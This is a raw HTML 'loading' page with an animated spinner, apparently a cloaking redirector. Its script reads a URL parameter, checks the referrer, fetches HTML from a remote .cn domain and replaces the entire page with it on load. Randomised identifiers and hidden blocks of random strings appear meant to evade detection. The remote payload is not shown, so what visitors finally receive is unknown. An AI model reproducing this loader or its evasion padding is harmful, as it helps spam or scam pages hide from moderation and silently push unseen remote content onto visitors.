<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .krYr6d {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .krYr6d .HfWzoIxQ9FG {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .krYr6d .content {
            line-height: 50px;
            text-align: center
        }

        .krYr6d .img {
            width: 100%
        }

        .krYr6d .LOCLtzq2 {
            text-align: center
        }

        .krYr6d .LOCLtzq2 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .krYr6d .LOCLtzq2 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .krYr6d .LOCLtzq2 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .krYr6d .LOCLtzq2 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .krYr6d .LOCLtzq2 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .krYr6d .LOCLtzq2 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .krYr6d .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function kmXA1nA1h(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var WQFPV = kmXA1nA1h('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ WQFPV +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ WQFPV +".html?a=share";
		}
		
        bCQdrOI=url+"#"+new Date().getTime();
        bCQdrOI && function() {
            $.get(bCQdrOI, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >GDSN22mrpMkDCDthG5gEXiNU03od2vTLcpF6MnOWjgCXe1kf39NBCcRqmoCEAbrFl5IyZEquQxlCGsIu</ul>
<div style='display:none'>VStyETgz8Pc3qnKet4Mxx1zYhOLvbJI0Rpi6hVjDs6Qf0</div>
<b style='display:none' >VshWQ1Xgq8BzP0MIRJKuY7vDdJP7dBz6ZTKzdZME6qCXmDzGAQzW</b>
<li style='display:none' >HEJubKabxC5ZYOWcyHFbXvjsC5mCWSbb8c48skbEkwWQ7x70VzsY</li>
<span style='display:none'>cRfAlXwziv3rrY22MnsvhS2qKluzbqD1Zt08GwtePhaT1Q1h0E</span>
<b style='display:none' >VshWQ1Xgq8BzP0MIRJKuY7vDdJP7dBz6ZTKzdZME6qCXmDzGAQzW</b>
<img  src='' style='display:none'><div class="krYr6d">
    <div class="HfWzoIxQ9FG">
        <div class="LOCLtzq2">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>UC31C0zocuYb0JNewZLXlD79XWATa7LyPORO9FyCd21ljfSa8Ox25nTOCA73EwJxj1jZaN6ISB9h8IcstvFjo</p>
<ul style='display:none' >ujPn4Hq181H3VfEdSIBft0Y5O8KZLbzxul1X</ul>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<p  style='display:none'>UC31C0zocuYb0JNewZLXlD79XWATa7LyPORO9FyCd21ljfSa8Ox25nTOCA73EwJxj1jZaN6ISB9h8IcstvFjo</p>
<ul style='display:none' >ujPn4Hq181H3VfEdSIBft0Y5O8KZLbzxul1X</ul></body>
</html>